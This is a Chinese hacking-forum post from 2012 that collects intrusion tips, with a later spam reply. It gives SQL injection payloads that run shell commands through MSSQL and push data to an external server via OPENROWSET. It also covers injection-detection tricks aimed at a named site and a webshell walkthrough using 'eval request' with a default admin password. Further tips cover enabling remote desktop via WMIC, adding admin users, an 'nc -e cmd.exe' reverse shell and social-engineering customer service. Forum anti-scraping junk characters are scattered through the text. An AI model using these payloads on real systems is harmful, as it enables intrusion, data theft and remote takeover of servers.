找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3276|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
. B2 ?* B$ x- S- j2 J& H; n# N2 n( I: n- j& n

% Y7 I/ m! N0 F. |SA点数据库分离搞法+语句:$ Q) f, N# }9 e5 k% m1 y# W0 H, ~  _$ k
) W& m7 l/ B; H8 \4 _& }" s
注射点不显错,执行下面三条语句页面都返回正常。1 R; w8 [' H7 t/ M% S3 Z: d8 E4 p
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')4 l7 W# W8 J( y( \6 ^- ]3 {+ t; ?
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
! r1 D3 O5 E8 s( G( S8 c9 u( ~, L5 Kand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')# b& }# @/ g9 h
可以列目录,判断系统为2000,web与数据库分离
5 s# W4 O* A; ?/ K, E% J遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。9 @- y$ o: q% K# v
在注射点上执行8 e2 f  n/ B( ]
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
4 Z2 X; x/ t5 m. w$ |页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP0 |( |8 |$ F* ?4 X, o0 Y! Q
还有我用NC监听得其他端口都没有得到IP。* r9 V- N! W8 A9 m2 g1 ?) O

$ K7 v8 X+ C2 j7 K* G# i$ q通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
8 o1 D! W! T* e) J  g6 j  x7 d'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
: x( o3 J3 y! a; O1 I- q
  s+ |0 k5 V9 j3 o2 z+ B;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--/ t% t6 }* o+ C/ k

' ?7 c* [; I( r" h现在就猜想是不是数据库是内网而且不能连外网。
3 f/ g: x, s# l0 s* D" O/ K6 U4 d4 Y' j, F
0 a- A) i5 y2 T5 o
access导出txt文本代码
* P! a5 A, ?, P) fSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
1 S' H3 ]& N% E: l" j3 v! D0 Q" w$ q6 g

4 f( z7 o# A+ M% @6 @  a
0 X! e. Z4 R5 E2 S: C) J1 ]8 P自动跳转到指定网站代码头
  M0 X6 B% _; @<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
6 O5 v4 N5 U& b2 y3 _- i* ~& H' |2 Q0 `8 N' Y
+ H' q  }  p" }8 S% X
入侵java or jsp站点时默认配置文件路径:6 b, |2 [% S3 Y
\web-inf\web.xml  Q* A% s# N; t  d' }' S
tomcat下的配置文件位置:8 v: S3 ^4 C3 n" [2 Z% K, B
\conf\server.xml            (前面加上tomcat路径)+ j" s, ~5 b4 H; A- _8 v, E4 R0 ?
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml, O# g* k& s7 ?4 F0 D( F

7 T: Q1 h0 m: B7 Z% a) }4 h1 j7 t! m. Q, ~2 x' Y
6 p' D6 z, X# `" a
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:& G6 F- A/ \5 c7 B/ F; l3 N
-1%23* G" j6 ^  g) V& C
>
5 e7 u: m( j" k9 @9 R9 Z<3 S: _3 t% |* k  f0 U
1'+or+'1'='12 g0 N, K6 S1 @- }8 C; V
id=8%bf
5 r. L* t; i% `! }3 t( C$ a: l
( n- U% E; v4 W, I全新注入点检测试法:$ p2 J0 b9 K2 L2 A6 n) y5 q0 ?
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。  B. Y( v2 ^- s9 v3 L. t+ W3 r  R
8 i! W; o& n9 s, v2 k' W
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
0 T8 C# V* A) g0 c: A! M$ E" `- C+ i9 a9 y2 J7 v
搜索型注入判断方法:
* k* c. m0 \& E' i6 y5 E- Q北京%' and '1'='1' and '%'='
9 g& X- @" i* Y; Q( |6 f' F: P北京%' and '1'='2' and '%'='/ J' z0 n/ u$ v" l" S0 Q0 O

! {: Q& ^7 I) y% E. U* t4 `% m! |  E- ^; p3 Z1 ~
COOKIES注入:' g) p5 L( A2 n. F1 \
; |6 u2 I3 P. w
javascript:alert(document.cookie="id="+escape("51 and 1=1"));
; t) u# x) X6 a4 w/ R. _/ e
. T; Y, ?6 g8 v! k, A( S. O2000专业版查看本地登录用户命令:7 T' X/ d/ Y3 W7 W6 X
net config workstation' y9 q( ~. n0 t9 r. _, U6 ?% Q
( v" ^4 H$ E' q/ [

8 y( }  O0 ^4 E% ~5 n2003下查看ipsec配置和默认防火墙配置命令:; x3 F, O$ g  R) P* _
netsh firewall show config
# W9 Q0 ?# m* ^( u" S+ mnetsh ipsec static show all1 y6 {# L1 I9 S) W8 G5 V% ~1 T
) ~; x0 X$ k/ r
不指派指定策略命令:
5 T5 d; T! x. K  Ynetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)6 |% e" R" o  L: S" i$ B3 k
netsh ipsec static show policy all  显示策略名
' b2 K/ v6 H, p$ e
0 x6 E( A& o, K- k$ F: {9 x: Z0 M- \0 m
猜管理员后台小技巧:( d! w% @- T# m& t, H" X7 ]  J
admin/left.asp 8 X: V" k# n1 _: K
admin/main.asp
  z7 o3 u# R  k+ m/ uadmin/top.asp  c$ z2 l0 P' c* s! v  d6 X7 P
admin/admin.asp / `- @3 @) f. c1 Z) Y. X0 N
会现出菜单导航,然后迅雷下载全部链接& K, f. X) v  V& ^

+ z  w+ ^$ @& z8 b/ W* }+ J
9 Q1 v/ Y& O; h8 n3 s社会工程学:$ b# S% }( m3 h3 W2 x4 p( T& a9 p
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
) k' _% ^" Y5 p- `9 m( m然后去骗客服
% W$ m5 U9 O* A- B; \" V) b- q
  Q: e6 y* B% }9 Z( Q, w, [; r
8 S2 Z' S+ m' ^( [3 W; m0 q统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 4 b) ?# n3 d4 Z7 Q4 ?  j
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
, U$ _1 D# d4 V1 J. j  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
; V- \  z& T5 r9 U* {, {0 [# [) C& @' l) n! n* K: I/ M' h2 S3 z6 Q

7 M4 m& M7 @9 s+ j- X
/ s1 d# \4 a. q  A( x3 S6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
/ H" ~! K- F. c7 M3 m+ C; }% ^0 S  m8 o+ @1 g7 U; R) p+ t2 d1 L
: e; E) O- f( @2 A( n2 R( B3 a6 ~) n

' x0 Q  q( J) l0 |CMD加密注册表位置1 ]$ |0 H% n0 g; Z
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor8 a' N* j" `* T4 j) V# t5 h8 D
AutoRun
: j# S, ~2 ~  W& R% J2 ^% x& K/ X$ C/ e, [
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
1 v/ _8 r5 R9 w* y' QAutoRun% M% O9 d/ i8 q
% F; p0 K  N( t5 R) x, N  X, Q
" S- i/ Q, O+ Q0 O' }! l
在找注入时搜索Hidden,把他改成test
4 D& Y# W. q' M' I6 X  V9 u
# E% _" M8 I- V$ \& |1 z
! C; `3 N# p, Y4 J5 s5 W) O( r) d& M% y( K/ J4 Q# e
mstsc /v:IP /console , I9 i& i7 V# }' |5 i5 e

2 @: m* S' N5 ]6 {
; L# _/ t5 k& f. B$ @" h一句话开3389:2 ^8 {- Y' q% i. V; r

* A( D) F' S% g. R6 g$ v最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  . k. f' Z1 {; \: N0 m0 P( f' _7 k
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了./ w6 Y$ T5 @% |: j" X/ c+ {$ i; r

5 Q& P3 h+ X- K: t( J. J# x- E5 ]4 n/ ?6 d! S5 w
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:4 w: {3 N( ?1 T6 B
Insert into admin(user,pwd) values('test','test')
& ?. l/ \0 v& T+ i; M( r; S, ~3 Y6 z
2 i2 x; v: N% w
9 ^* M  V/ v# v' ~. J/ MNC反弹
) P/ \, K4 w( f% ?% a- U3 {先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
8 o; B5 z. d) D然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
  O# m! k7 v; Z2 p: v9 a2 U
' P  i. q5 p0 B2 ^
( U4 j% J; u) Z在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
6 f+ Q) c+ ~+ q, S" g! E8 y' G4 |
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录; W4 {+ ~  P1 U8 h+ b- A
例如:) ^6 n8 L/ A, E' x
subst k: d:\www\ 用d盘www目录替代k盘1 w! O: U; b1 U' ?
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表